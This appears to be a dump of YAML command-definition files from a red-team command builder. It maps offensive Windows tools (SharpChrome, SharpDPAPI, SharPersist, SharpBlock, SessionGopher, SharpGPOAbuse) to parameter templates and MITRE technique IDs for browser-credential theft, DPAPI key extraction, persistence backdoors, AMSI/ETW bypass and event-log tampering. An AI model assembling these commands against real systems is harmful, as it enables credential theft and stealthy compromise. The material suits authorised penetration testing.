"DpapiMasterKeys", 49 | "Dsregcmd", 50 | "EnvironmentPath", 51 | "EnvironmentVariables", 52 | "ExplicitLogonEvents", 53 | "ExplorerMRUs", 54 | "ExplorerRunCommands", 55 | "FileInfo", 56 | "FileZilla", 57 | "FirefoxHistory", 58 | "FirefoxPresence", 59 | "Hotfixes", 60 | "IdleTime", 61 | "IEFavorites", 62 | "IETabs", 63 | "IEUrls", 64 | "InstalledProducts", 65 | "InterestingFiles", 66 | "InterestingProcesses", 67 | "InternetSettings", 68 | "KeePass", 69 | "LAPS", 70 | "LastShutdown", 71 | "LocalGPOs", 72 | "LocalGroups", 73 | "LocalUsers", 74 | "LogonEvents", 75 | "LogonSessions", 76 | "LOLBAS", 77 | "LSASettings", 78 | "MappedDrives", 79 | "McAfeeConfigs", 80 | "McAfeeSiteList", 81 | "MicrosoftUpdates", 82 | "NamedPipes", 83 | "NetworkProfiles", 84 | "NetworkShares", 85 | "NTLMSettings", 86 | "OfficeMRUs", 87 | "OptionalFeatures", 88 | "OracleSQLDeveloper", 89 | "OSInfo", 90 | "OutlookDownloads", 91 | "PoweredOnEvents", 92 | "PowerShell", 93 | "PowerShellEvents", 94 | "PowerShellHistory", 95 | "Printers", 96 | "ProcessCreationEvents", 97 | "Processes", 98 | "ProcessOwners", 99 | "PSSessionSettings", 100 | "PuttyHostKeys", 101 | "PuttySessions", 102 | "RDCManFiles", 103 | "RDPSavedConnections", 104 | "RDPSessions", 105 | "RDPsettings", 106 | "RecycleBin", 107 | "reg", 108 | "RPCMappedEndpoints", 109 | "SCCM", 110 | "ScheduledTasks", 111 | "SearchIndex", 112 | "SecPackageCreds", 113 | "SecurityPackages", 114 | "Services", 115 | "SlackDownloads", 116 | "SlackPresence", 117 | "SlackWorkspaces", 118 | "SuperPutty", 119 | "Sysmon", 120 | "SysmonEvents", 121 | "TcpConnections", 122 | "TokenGroups", 123 | "TokenPrivileges", 124 | "UAC", 125 | "UdpConnections", 126 | "UserRightAssignments", 127 | "WindowsAutoLogon", 128 | "WindowsCredentialFiles", 129 | "WindowsDefender", 130 | "WindowsEventForwarding", 131 | "WindowsFirewall", 132 | "WindowsVault", 133 | "WMI", 134 | "WMIEventConsumer", 135 | "WMIEventFilter", 136 | "WMIFilterBinding", 137 | "WSUS", 138 | ] 139 | optional: true 140 | 141 | - name: Targets 142 | type: label 143 | 144 | - name: ComputerName 145 | type: text 146 | description: Remote computer name to enumerate (full FQDN or IP) 147 | template: "-computername={0}" 148 | default: comp1.example.local 149 | optional: true 150 | 151 | - name: Authentication 152 | type: label 153 | 154 | - name: Domain 155 | type: text 156 | description: Domain name 157 | template: "{0}" 158 | default: example.local 159 | optional: false 160 | - name: Username 161 | type: text 162 | description: Username 163 | template: "-username={Domain}\\{0}" 164 | default: User1 165 | optional: true 166 | - name: Password 167 | type: text 168 | description: Password 169 | template: "-password={0}" 170 | default: Password123 171 | optional: true 172 | 173 | - name: Output 174 | type: label 175 | 176 | - name: OutputFile 177 | type: text 178 | description: Output file path (Specifying json suffix will produce Json output) 179 | template: "-outputfile=\"{0}\"" 180 | default: C:\temp\out.txt 181 | optional: true 182 | 183 | - name: Flags 184 | type: label 185 | 186 | - name: Full 187 | type: flag 188 | description: argument prevents filtering output 189 | value: -full 190 | optional: true 191 | selected: true 192 | - name: Quiet 193 | type: flag 194 | description: Execute in quiet mode 195 | value: -q 196 | optional: true 197 | selected: false 198 | 199 | 200 | sections: 201 | - name: Self crafted command 202 | labels: ["Recon"] 203 | mitre: 'T1592' 204 | verb: '' 205 | required_flags: [] 206 | optional_flags: [SbCommand, SbGroup, ComputerName, Username, Password, OutputFile, Full, Quiet] 207 | 208 | - name: Run specific command 209 | labels: ["Recon"] 210 | mitre: 'T1592' 211 | verb: '' 212 | required_flags: [SbCommand] 213 | optional_flags: [ComputerName, Username, Password, OutputFile, Full, Quiet] 214 | 215 | - name: Run specific group of commands 216 | labels: ["Recon"] 217 | mitre: 'T1592' 218 | verb: '' 219 | required_flags: [SbGroup] 220 | optional_flags: [ComputerName, Username, Password, OutputFile, Full, Quiet] 221 | 222 | - name: Run checks on remote host 223 | labels: ["Recon"] 224 | mitre: 'T1592' 225 | verb: '' 226 | required_flags: [ComputerName] 227 | optional_flags: [SbCommand, SbGroup, Username, Password, OutputFile, Full, Quiet] 228 | 229 | - name: Run checks with credentials 230 | labels: ["Recon"] 231 | mitre: 'T1592' 232 | verb: '' 233 | required_flags: [Username, Password] 234 | optional_flags: [SbCommand, SbGroup, ComputerName, OutputFile, Full, Quiet] -------------------------------------------------------------------------------- /commands/SessionGopher.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/Arvanaghi/SessionGopher 3 | name: SessionGopher 4 | languages: 5 | - name: PS 6 | prefix: Invoke-SessionGopher 7 | 8 | params: 9 | - name: Target 10 | type: text 11 | description: A specific host you want to target. 12 | template: "-Target {0}" 13 | default: Server01 14 | optional: true 15 | - name: Targets 16 | type: text 17 | description: A file with a list of hosts to run SessionGopher against. 18 | template: "-iL {0}" 19 | default: .\path-to-file.txt 20 | optional: true 21 | - name: Output 22 | type: text 23 | description: outputs the data to a folder of .csv files 24 | template: "-o {0}" 25 | default: C:\temp 26 | optional: true 27 | - name: Username 28 | type: text 29 | description: Username 30 | template: "-u {0}" 31 | default: User1 32 | optional: true 33 | - name: Password 34 | type: text 35 | description: Password 36 | template: "-p {0}" 37 | default: Password123 38 | optional: true 39 | 40 | - name: Thorough 41 | type: flag 42 | description: searches all drives for PuTTY private key (.ppk), Remote Desktop Connecton (.rdp), and RSA (.sdtid) files. 43 | value: -Thorough 44 | optional: true 45 | selected: false 46 | - name: AllDomain 47 | type: flag 48 | description: SessionGopher will query Active Directory for all domain-joined systems and run against all of them. 49 | value: -AllDomain 50 | optional: true 51 | selected: false 52 | 53 | sections: 54 | - name: Self crafted command 55 | labels: ["Credentials Access", "Creds", "NoCreds"] 56 | mitre: 'T1634' 57 | verb: '' 58 | required_flags: [] 59 | optional_flags: [Target, Targets, AllDomain, Username, Password, Output, Thorough] 60 | - name: Run locally 61 | labels: ["Credential Access"] 62 | mitre: 'T1634' 63 | verb: '' 64 | required_flags: [] 65 | optional_flags: [Thorough] 66 | - name: Run remotely against all instances in the domain 67 | labels: ["Credential Access"] 68 | mitre: 'T1634' 69 | verb: '' 70 | required_flags: [AllDomain] 71 | optional_flags: [Username, Password, Output, Thorough] 72 | - name: Run remotely against a specific target 73 | labels: ["Credential Access"] 74 | mitre: 'T1634' 75 | verb: '' 76 | required_flags: [Target] 77 | optional_flags: [Username, Password, Output, Thorough] 78 | - name: Run remotely against specific hosts (file path containing targets) 79 | labels: ["Credential Access"] 80 | mitre: 'T1634' 81 | verb: '' 82 | required_flags: [Targets] 83 | optional_flags: [Username, Password, Output, Thorough] -------------------------------------------------------------------------------- /commands/SharPersist.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/mandiant/SharPersist 3 | name: SharPersist 4 | languages: 5 | - name: EXE 6 | prefix: SharPersist.exe 7 | 8 | params: 9 | - name: Technique 10 | description: Persistance technique 11 | default: startupfolder 12 | template: "-t {0}" 13 | type: select 14 | options: [ "keepass", "reg", "schtaskbackdoor", "startupfolder", "tortoisesvn", "service", "schtask" ] 15 | optional: false 16 | - name: Method 17 | description: Method to execute 18 | default: list 19 | template: "-m {0}" 20 | type: select 21 | options: ["add", "remove", "check", "list"] 22 | optional: false 23 | - name: AddOns 24 | description: Optional Add-Ons 25 | default: env 26 | template: "-o {0}" 27 | type: select 28 | options: ["env", "hourly", "daily", "logon"] 29 | optional: true 30 | - name: RegKeys 31 | description: Registry Keys 32 | default: logonscript 33 | template: "-k {0}" 34 | type: select 35 | options: [ "hklmrun", "hklmrunonce", "hklmrunonceex", "hkcurun", "hkcurunonce", "logonscript", "stickynotes", "userinit" ] 36 | optional: true 37 | - name: Command 38 | type: text 39 | description: Command to execute. 40 | template: "-c \"{0}\"" 41 | default: C:\Windows\System32\cmd.exe 42 | optional: true 43 | - name: Arguments 44 | type: text 45 | description: Arguments to command to execute (if applicable) 46 | template: "-a \"{0}\"" 47 | default: /c calc.exe 48 | optional: true 49 | - name: FileName 50 | type: text 51 | description: The file to create/modify 52 | template: "-f \"{0}\"" 53 | default: file_path 54 | optional: true 55 | - name: RegistryValue 56 | type: text 57 | description: Registry value to create/modify 58 | template: "-v \"{0}\"" 59 | default: TestValue 60 | optional: true 61 | - name: TaskName 62 | type: text 63 | description: Scheduled task name or service name 64 | template: "-n {0}" 65 | default: TestTask 66 | optional: true 67 | 68 | 69 | 70 | sections: 71 | - name: Self crafted command 72 | labels: [] 73 | mitre: '' 74 | verb: '' 75 | required_flags: [Technique, Method] 76 | optional_flags: [Command, Arguments, AddOns, RegKeys, FileName, RegistryValue, TaskName] 77 | - name: KeePass 78 | labels: ["Persistency"] 79 | mitre: '' 80 | verb: '-t keepass' 81 | required_flags: [Command, Arguments, FileName, Method] 82 | optional_flags: [] 83 | - name: Registry 84 | labels: [] 85 | mitre: '' 86 | verb: '-t reg' 87 | required_flags: [Command, RegKeys, Method] 88 | optional_flags: [Arguments, RegistryValue, AddOns] 89 | - name: Scheduled Task Backdoor 90 | labels: [] 91 | mitre: '' 92 | verb: '-t schtaskbackdoor' 93 | required_flags: [Command, TaskName, Method] 94 | optional_flags: [Arguments] 95 | - name: Startup Folder 96 | labels: [] 97 | mitre: '' 98 | verb: '-t startupfolder' 99 | required_flags: [Command, FileName, Method] 100 | optional_flags: [Arguments] 101 | - name: Tortoise SVN 102 | labels: [] 103 | mitre: '' 104 | verb: '-t tortoisesvn' 105 | required_flags: [Command, Method] 106 | optional_flags: [Arguments] 107 | - name: Windows Service 108 | labels: [] 109 | mitre: '' 110 | verb: '-t service' 111 | required_flags: [Command, TaskName, Method] 112 | optional_flags: [Arguments] 113 | - name: Scheduled Task 114 | labels: [] 115 | mitre: '' 116 | verb: '-t schtask' 117 | required_flags: [Command, TaskName, Method] 118 | optional_flags: [Arguments, AddOns] -------------------------------------------------------------------------------- /commands/SharpBlock.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/CCob/SharpBlock 3 | name: SharpBlock 4 | languages: 5 | - name: EXE 6 | prefix: SharpBlock.exe 7 | 8 | params: 9 | - name: Program 10 | type: text 11 | description: Program to execute, can be remote path. 12 | template: "-e \"{0}\"" 13 | default: C:\Windows\System32\cmd.exe 14 | optional: false 15 | - name: Arguments 16 | type: text 17 | description: Arguments for program. 18 | template: "-a \"{0}\"" 19 | default: 20 | optional: true 21 | - name: BlockDLLs 22 | type: text 23 | description: Name of DLL to block. (for multiple dlls need to use this flag multiple times) 24 | template: "-n \"{0}\"" 25 | default: 26 | optional: true 27 | - name: BlockCopyright 28 | type: text 29 | description: Copyright string to block. 30 | template: "-c \"{0}\"" 31 | default: 32 | optional: true 33 | - name: BlockProduct 34 | type: text 35 | description: Product string to block. 36 | template: "-p \"{0}\"" 37 | default: 38 | optional: true 39 | - name: BlockDescription 40 | type: text 41 | description: Description string to block. 42 | template: "-d \"{0}\"" 43 | default: 44 | optional: true 45 | - name: SpawnProcess 46 | type: text 47 | description: Host process to spawn for swapping with the target exe. 48 | template: "-s {0}" 49 | default: chrome.exe 50 | optional: true 51 | - name: PPID 52 | type: text 53 | description: Parent process ID for spawned child (PPID Spoofing) 54 | template: "--ppid={0}" 55 | default: 4 56 | optional: true 57 | 58 | - name: Show 59 | type: flag 60 | description: Show the lauched process window instead of the default hide 61 | value: "-w" 62 | optional: true 63 | selected: false 64 | - name: DisableBypassAMSI 65 | type: flag 66 | description: Disable AMSI bypassAmsi 67 | value: --disable-bypass-amsi 68 | optional: true 69 | selected: false 70 | - name: DisableBypassCmd 71 | type: flag 72 | description: Disable command line bypass 73 | value: --disable-bypass-cmdline 74 | optional: true 75 | selected: false 76 | - name: DisableBypassETW 77 | type: flag 78 | description: Disable ETW bypass 79 | value: --disable-bypass-etw 80 | optional: true 81 | selected: false 82 | - name: DisableHeaderPatch 83 | type: flag 84 | description: Disable process hollow detection bypass 85 | value: --disable-header-patch 86 | optional: true 87 | selected: false 88 | 89 | sections: 90 | - name: Self crafted command 91 | labels: ["Execution", "Evasion"] 92 | mitre: 'T1562' 93 | verb: '' 94 | required_flags: [Program] 95 | optional_flags: [Arguments, SpawnProcess, PPID, BlockDLLs, BlockCopyright, BlockProduct, BlockDescription, Show, DisableBypassAMSI, DisableBypassCmd, DisableBypassETW, DisableHeaderPatch] 96 | 97 | - name: Execute assembly with arguments and bypasses 98 | labels: ["Execution", "Evasion"] 99 | mitre: "T1564.010" 100 | verb: '' 101 | required_flags: [Program] 102 | optional_flags: [Arguments, Show, DisableBypassAMSI, DisableBypassCmd, DisableBypassETW, DisableHeaderPatch] 103 | - name: Execute assembly, with blocking rules 104 | labels: ["Execution", "Evasion"] 105 | mitre: 'T1562' 106 | verb: '' 107 | required_flags: [Program] 108 | optional_flags: [Arguments, BlockDLLs, BlockCopyright, BlockProduct, BlockDescription, Show, DisableBypassAMSI, DisableBypassCmd, DisableBypassETW, DisableHeaderPatch] 109 | - name: Spawn process and execute assembly 110 | labels: ["Execution", "Evasion"] 111 | mitre: 'T1055.012' 112 | verb: '' 113 | required_flags: [Program, SpawnProcess] 114 | optional_flags: [Arguments, BlockDLLs, BlockCopyright, BlockProduct, BlockDescription, Show, DisableBypassAMSI, DisableBypassCmd, DisableBypassETW, DisableHeaderPatch] 115 | - name: Execute assembly with PID spoofing 116 | labels: ["Execution", "Evasion"] 117 | mitre: 'T1134.004' 118 | verb: '' 119 | required_flags: [Program, PPID] 120 | optional_flags: [Arguments, BlockDLLs, BlockCopyright, BlockProduct, BlockDescription, Show, DisableBypassAMSI, DisableBypassCmd, DisableBypassETW, DisableHeaderPatch] 121 | -------------------------------------------------------------------------------- /commands/SharpChrome.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/GhostPack/SharpDPAPI 3 | name: SharpChrome 4 | languages: 5 | - name: EXE 6 | prefix: SharpChrome.exe 7 | - name: Apollo 8 | prefix: inline_assembly -Assembly "SharpChrome.exe" -Arguments " 9 | 10 | params: 11 | - name: Targeting 12 | type: label 13 | 14 | - name: server 15 | description: Target server to interact with 16 | template: "/server:{0}" 17 | default: '' 18 | type: text 19 | optional: true 20 | - name: target 21 | description: Triage a specific 'Cookies', 'Login Data', 'Local State' location or specific user folder 22 | template: "/target:{0}" 23 | default: '' 24 | type: text 25 | optional: true 26 | - name: browser 27 | description: 'Triage chrome (the default) or (chromium-based) edge' 28 | template: "/browser:{0}" 29 | default: chrome 30 | type: select 31 | options: [chrome,edge] 32 | optional: true 33 | selected: false 34 | 35 | - name: Decryption 36 | type: label 37 | 38 | - name: unprotect 39 | description: Force use of CryptUnprotectData() (default for unprivileged execution) 40 | type: flag 41 | value: "/unprotect" 42 | 43 | - name: pvk 44 | type: text 45 | description: DPAPI domain private key file/Base64 to decrypt reachable user masterkeys 46 | template: "/pvk:{0}" 47 | default: 'key.pvk' 48 | optional: true 49 | 50 | - name: password 51 | description: Decrypt the current user's masterkeys using a plaintext password 52 | type: text 53 | template: "/password:{0}" 54 | optional: true 55 | 56 | - name: guid-sha 57 | type: text 58 | description: 'One or more GUID:SHA1 masterkeys for decryption of discovered DPAPI blobs' 59 | template: "{0}" 60 | default: '{44ca9f3a-9097-455e-94d0-d91de951c097}:9b049ce6918ab89937687' 61 | optional: true 62 | selected: false 63 | 64 | - name: mkfile 65 | description: Use a file of one or more GUID:SHA1 masterkeys for decryption 66 | type: text 67 | template: "/mkfile:{0}" 68 | optional: true 69 | 70 | - name: statekey 71 | description: Decrypted AES state key (from the 'statekeys' command) 72 | type: text 73 | template: "/mkfile:{0}" 74 | optional: true 75 | 76 | - name: Output 77 | type: label 78 | 79 | - name: nowrap 80 | description: Disable backupkey base64 output value line wrapping 81 | value: "/nowrap" 82 | type: flag 83 | optional: true 84 | 85 | - name: file 86 | type: text 87 | description: Output file for the PVK for 'backupkey' command 88 | template: "/file:{0}" 89 | default: 'key.pvk' 90 | optional: true 91 | 92 | - name: format 93 | description: 'Choose how to display the output. JSON available only for cookies command' 94 | template: "/format:{0}" 95 | default: chrome 96 | type: select 97 | options: [csv,table,json] 98 | optional: true 99 | selected: false 100 | 101 | - name: showall 102 | description: Show Login Data entries with null passwords and expired Cookies instead of filtering 103 | value: "/showall" 104 | type: flag 105 | optional: true 106 | 107 | - name: consoleoutfile 108 | type: text 109 | description: Output all console output to a file on disk 110 | template: "/consoleoutfile:{0}" 111 | default: 'consoleout.txt' 112 | optional: true 113 | 114 | - name: setneverexpire 115 | description: Set expirations for cookies output to now + 100 years (for json output) 116 | value: "/setneverexpire" 117 | type: flag 118 | optional: true 119 | 120 | - name: Cookies filtering 121 | type: label 122 | 123 | - name: cookie 124 | type: text 125 | description: Return cookies where the cookie name matches the supplied regex 126 | template: "/cookie:{0}" 127 | default: 'login' 128 | optional: true 129 | 130 | - name: url 131 | type: text 132 | description: Return cookies where the cookie URL matches the supplied regex 133 | template: "/url:{0}" 134 | default: 'login.microsoftonline.com' 135 | optional: true 136 | 137 | 138 | sections: 139 | - name: Get domain backup key as Base64 string # SharpChrome backupkey /nowrap /server:{{DomainController}} file:{{Path}} 140 | labels: ["Credential Access"] 141 | mitre: '' 142 | verb: 'backupkey' 143 | required_flags: [] 144 | optional_flags: [server, nowrap, file] 145 | - name: Get browser saved logins # SharpChrome.exe logins /server:{{Server}} 146 | labels: ["Credential Access"] 147 | mitre: '' 148 | verb: 'logins' 149 | required_flags: [] 150 | optional_flags: [ 151 | target, server, browser, 152 | unprotect, password, guid-sha, mkfile, pvk, statekey, 153 | format, showall, consoleoutfile 154 | ] 155 | - name: Get browser cookies 156 | labels: ["Credential Access"] 157 | mitre: '' 158 | verb: 'cookies' 159 | required_flags: [] 160 | optional_flags: [ 161 | target, server, browser, 162 | unprotect, password, guid-sha, mkfile, pvk, statekey, 163 | cookie, url, setneverexpire, # Cookies command only 164 | format, showall, consoleoutfile 165 | ] 166 | - name: Get the browser's statekey 167 | labels: ["Credential Access"] 168 | mitre: '' 169 | verb: 'statekeys' 170 | required_flags: [] 171 | optional_flags: [ 172 | target, server, browser, 173 | unprotect, password, guid-sha, mkfile, pvk, statekey, 174 | format, showall, consoleoutfile 175 | ] -------------------------------------------------------------------------------- /commands/SharpClipboard.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/slyd0g/SharpClipboard 3 | name: SharpClipboard 4 | languages: 5 | - name: EXE 6 | prefix: SharpClipboard.exe 7 | 8 | params: 9 | 10 | sections: 11 | - name: Monitor Clipboard 12 | labels: ["Lateral", "Creds", "Clipboard"] 13 | mitre: '' 14 | verb: '' 15 | required_flags: [] 16 | optional_flags: [] -------------------------------------------------------------------------------- /commands/SharpCloud.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/chrismaddalena/SharpCloud 3 | name: SharpCloud 4 | languages: 5 | - name: EXE 6 | prefix: SharpCloud.exe 7 | 8 | params: 9 | - name: SCOption 10 | description: SharpCloud param 11 | default: all 12 | template: "{0}" 13 | type: select 14 | options: ["all", "aws", "azure", "gcloud"] 15 | optional: false 16 | 17 | sections: 18 | - name: Search for cloud service credentials 19 | labels: ["Recon"] 20 | mitre: 'T1589.001' 21 | verb: '' 22 | required_flags: [SCOption] 23 | optional_flags: [] -------------------------------------------------------------------------------- /commands/SharpCrashEventLog.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/slyd0g/SharpCrashEventLog 3 | name: SharpCrashEventLog 4 | languages: 5 | - name: EXE 6 | prefix: SharpCrashEventLog 7 | 8 | params: 9 | - name: Target 10 | type: text 11 | description: Target server or workstation 12 | template: "\\\\{0}" 13 | default: localhost 14 | optional: false 15 | 16 | sections: 17 | - name: Crash the target computer's event log service 18 | labels: ["Execution", "Evasion"] 19 | mitre: 'T1562.002' 20 | verb: '' 21 | required_flags: [Target] 22 | optional_flags: [] -------------------------------------------------------------------------------- /commands/SharpDPAPI.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/GhostPack/SharpDPAPI 3 | name: SharpDPAPI 4 | languages: 5 | - name: EXE 6 | prefix: 'SharpDPAPI.exe' 7 | - name: C2 8 | prefix: 'execute-assembly /path/to/local/SharpDPAPI.exe' 9 | 10 | params: 11 | - name: Decryption Keys 12 | type: label 13 | 14 | - name: pvk 15 | type: text 16 | description: DPAPI domain private key file/Base64 to decrypt reachable user masterkeys 17 | template: "/pvk:{0}" 18 | default: 'key.pvk' 19 | optional: false 20 | 21 | - name: password 22 | type: text 23 | description: User's plain-text password to decrypt the current user's discovered masterkeys 24 | template: "/password:{0}" 25 | default: '' 26 | optional: false 27 | 28 | - name: guid-sha 29 | type: text 30 | description: 'One or more GUID:SHA1 masterkeys for decryption of discovered DPAPI blobs' 31 | template: "{0}" 32 | default: '{44ca9f3a-9097-455e-94d0-d91de951c097}:9b049ce6918ab89937687' 33 | optional: true 34 | selected: false 35 | 36 | - name: mkfile 37 | type: text 38 | description: 'A file of one or more GUID:SHA1 masterkeys for decryption of discovered DPAPI blobs' 39 | template: "/mkfile:{0}" 40 | default: 'masterkeys.txt' 41 | optional: true 42 | selected: false 43 | 44 | - name: Target 45 | type: label 46 | 47 | - name: server 48 | type: text 49 | description: 'Domain Controller server to target' 50 | template: "/server:{0}" 51 | default: 'dc.domain.local' 52 | optional: true 53 | selected: false 54 | 55 | - name: target 56 | type: text 57 | description: 'Filer/Folder to target for the operation' 58 | template: "/target:{0}" 59 | default: 60 | optional: true 61 | selected: false 62 | 63 | - name: type 64 | description: 'Type of objects for the search command' 65 | default: 66 | template: "/type:{0}" 67 | type: select 68 | options: ['registry', 'folder', 'file', 'base64'] 69 | optional: false 70 | 71 | - name: path 72 | type: text 73 | description: 'Optional path to focus the search (Syntax depend on the type)' 74 | template: "/path:{0}" 75 | default: 'C:\path\to\file' 76 | optional: true 77 | selected: true 78 | 79 | - name: Filter 80 | type: label 81 | 82 | - name: maxBytes 83 | type: text 84 | description: 'Maximum file size to filter for the search commmand' 85 | template: "/maxBytes:{0}" 86 | default: '16000' 87 | optional: true 88 | selected: false 89 | 90 | - name: base 91 | type: text 92 | description: 'Base64 string to filter for the search command' 93 | template: "/base:{0}" 94 | default: '' 95 | optional: true 96 | selected: false 97 | 98 | - name: Output 99 | type: label 100 | 101 | - name: file 102 | type: text 103 | description: 'Path to output file' 104 | template: "/file:{0}" 105 | default: 'key.pvk' 106 | optional: true 107 | selected: false 108 | 109 | - name: Flags 110 | type: label 111 | 112 | - name: unprotect 113 | type: flag 114 | description: 'Force use of CryptUnprotectData() for ps, rdg, or blob commands' 115 | value: '/unprotect' 116 | optional: true 117 | selected: false 118 | 119 | - name: showall 120 | type: flag 121 | description: 'Show all decrypted private key files, not just ones that are linked to installed certs (the default)' 122 | value: '/showall' 123 | optional: true 124 | selected: false 125 | 126 | - name: machine 127 | type: flag 128 | description: 'Use the local machine store for certificate triage' 129 | value: '/machine' 130 | optional: true 131 | selected: false 132 | 133 | - name: Display Flags 134 | type: label 135 | 136 | - name: nowrap 137 | description: 'Dont wrap the lines of the displayed base64 keys' 138 | optional: true 139 | selected: false 140 | type: flag 141 | value: '/nowrap' 142 | 143 | - name: showErrors 144 | type: flag 145 | description: desc 146 | value: '/showErrors' 147 | optional: true 148 | selected: false 149 | 150 | 151 | sections: 152 | - name: 'Retrieve a domain controller DPAPI backup key, optionally specifying a DC and output file' 153 | labels: ['Credential Access'] 154 | mitre: '' 155 | verb: 'backupkey' 156 | required_flags: [] 157 | optional_flags: [nowrap, server, file] 158 | 159 | - name: 'Triage user Masterkey files' 160 | labels: ['Credential Access'] 161 | mitre: '' 162 | verb: 'masterkeys' 163 | required_flags: [pvk] 164 | optional_flags: [server, target, password] 165 | 166 | - name: 'Search and decrypt Credential files for all users by providing masterkey GUID:SHA' 167 | labels: ['Credential Access'] 168 | mitre: 'T1555.004' 169 | verb: 'credentials' 170 | required_flags: [guid-sha] 171 | optional_flags: [guid-sha, unprotect, mkfile, showall, machine, password, server, target] 172 | 173 | - name: 'Search and decrypt Credential files for all users by providing the domain backup key' 174 | labels: ['Credential Access'] 175 | mitre: 'T1555.004' 176 | verb: 'credentials' 177 | required_flags: [pvk] 178 | optional_flags: [guid-sha, unprotect, mkfile, showall, machine, password, server, target] 179 | 180 | - name: 'Search for KeePass ProtectedUserKey.bin files for the current user (or if elevated, all users), and decrypt them' 181 | labels: ['Credential Access'] 182 | mitre: 'T1555.005' 183 | verb: 'keepass' 184 | required_flags: [unprotect] 185 | optional_flags: [password, guid-sha, mkfile, pvk] 186 | 187 | - name: 'Search user encrypted DPAPI certificate private keys, and decrpyt them using the domain backup key' 188 | labels: [] 189 | mitre: '' 190 | verb: 'certificates' 191 | required_flags: [pvk] 192 | optional_flags: [mkfile, target, pvk, server, password, machine, showall] 193 | 194 | - name: 'Elevate to SYSTEM to retrieve the DPAPI_SYSTEM LSA secret and decrypt any found machine DPAPI masterkeys' 195 | labels: [] 196 | mitre: 'T1003.004' 197 | verb: 'machinemasterkeys' 198 | required_flags: [] 199 | optional_flags: [] 200 | 201 | - name: 'Elevate to SYSTEM to retrieve the DPAPI_SYSTEM LSA secret, decrypt any found machine DPAPI masterkeys, and triage machine Credential files and Vaults' 202 | labels: ['Credential Access'] 203 | mitre: '' 204 | verb: 'machinetriage' 205 | required_flags: [] 206 | optional_flags: [] 207 | 208 | 209 | - name: 'Use the machine certificate store to look for decryptable machine certificate private keys' 210 | labels: [] 211 | mitre: '' 212 | verb: 'certificates' 213 | required_flags: [machine] 214 | optional_flags: [target, mkfile, showall] 215 | 216 | - name: 'Describe/decrypt a DPAPI blob' 217 | labels: [] 218 | mitre: '' 219 | verb: 'blob' 220 | required_flags: [target, unprotect] 221 | optional_flags: [pvk] 222 | 223 | - name: 'Search for potential DPAPI blobs in the registry / files / folders or base64 blobs' 224 | labels: [] 225 | mitre: '' 226 | verb: 'search' 227 | required_flags: [type] 228 | optional_flags: [path, base, maxBytes, showErrors] -------------------------------------------------------------------------------- /commands/SharpEDRChecker.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/PwnDexter/SharpEDRChecker 3 | name: SharpEDRChecker 4 | languages: 5 | - name: EXE 6 | prefix: SharpEDRChecker.exe 7 | 8 | params: 9 | 10 | 11 | sections: 12 | - name: Reconnaissance EDRs on local host 13 | labels: ["Recon"] 14 | mitre: '' 15 | verb: '' 16 | required_flags: [] 17 | optional_flags: [] -------------------------------------------------------------------------------- /commands/SharpFinder.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/s0lst1c3/SharpFinder 3 | name: SharpFinder 4 | languages: 5 | - name: EXE 6 | prefix: SharpFinder.exe 7 | 8 | params: 9 | - name: Path 10 | type: text 11 | description: Path to single directory for enumeration 12 | template: "--path={0}" 13 | default: \\Remote\C$ 14 | optional: true 15 | - name: InputFile 16 | type: text 17 | description: File path containing list of directories 18 | template: "--input-file={0}" 19 | default: directory-list.txt 20 | optional: true 21 | - name: Keywords 22 | type: text 23 | description: Keywords used to filter files by name. 24 | template: "--keywords={0}" 25 | default: creds,credential,admin,password 26 | optional: true 27 | - name: Extensions 28 | type: text 29 | description: Extensions used to filter files by type. 30 | template: "--extensions={0}" 31 | default: exe,xml,bat,ps1 32 | optional: true 33 | 34 | - name: Readable 35 | type: flag 36 | description: Filter files with read access to 37 | value: "--readable" 38 | optional: true 39 | selected: false 40 | - name: Writeable 41 | type: flag 42 | description: Filter files with write access to 43 | value: "--writeable" 44 | optional: true 45 | selected: false 46 | - name: ReadWriteable 47 | type: flag 48 | description: Filter files with read and write access to (Used in conjunction with previous flags) 49 | value: "--acl-filter-mode-and" 50 | optional: true 51 | selected: false 52 | - name: ExcludeHidden 53 | type: flag 54 | description: Exclude hidden files from search 55 | value: "--exclude-hidden" 56 | optional: true 57 | selected: false 58 | 59 | sections: 60 | - name: Self crafted command 61 | labels: [] 62 | mitre: '' 63 | verb: '' 64 | required_flags: [] 65 | optional_flags: [Path, InputFile, Keywords, Extensions, Readable, Writeable, ReadWriteable, ExcludeHidden] 66 | 67 | - name: Search files in specific directory 68 | labels: [] 69 | mitre: '' 70 | verb: '' 71 | required_flags: [Path] 72 | optional_flags: [Keywords, Extensions, Readable, Writeable, ReadWriteable, ExcludeHidden] 73 | 74 | - name: Search files in multiple directories 75 | labels: [] 76 | mitre: '' 77 | verb: '' 78 | required_flags: [InputFile] 79 | optional_flags: [Keywords, Extensions, Readable, Writeable, ReadWriteable, ExcludeHidden] -------------------------------------------------------------------------------- /commands/SharpGPOAbuse.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/FSecureLABS/SharpGPOAbuse 3 | name: SharpGPOAbuse 4 | languages: 5 | - name: EXE 6 | prefix: SharpGPOAbuse.exe 7 | 8 | params: 9 | - name: AttackType 10 | description: The attack type to use 11 | default: "--AddComputerScript" 12 | template: "{0}" 13 | type: select 14 | options: ["--AddUserRights", "--AddLocalAdmin", "--AddComputerScript", "--AddUserScript", "--AddComputerTask", "--AddUserTask"] 15 | optional: false 16 | 17 | - name: Rights manipulation 18 | type: label 19 | 20 | - name: UserRights 21 | type: text 22 | description: Set the new rights to add to a user. This option is case sensitive and a comma separeted list must be used. 23 | template: "--UserRights \"{0}\"" 24 | default: SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight 25 | optional: true 26 | - name: UserAccount 27 | type: text 28 | description: Set the account to add the new rights. 29 | template: "--UserAccount {0}" 30 | default: bob.smith 31 | optional: true 32 | - name: GPOName 33 | type: text 34 | description: The name of the 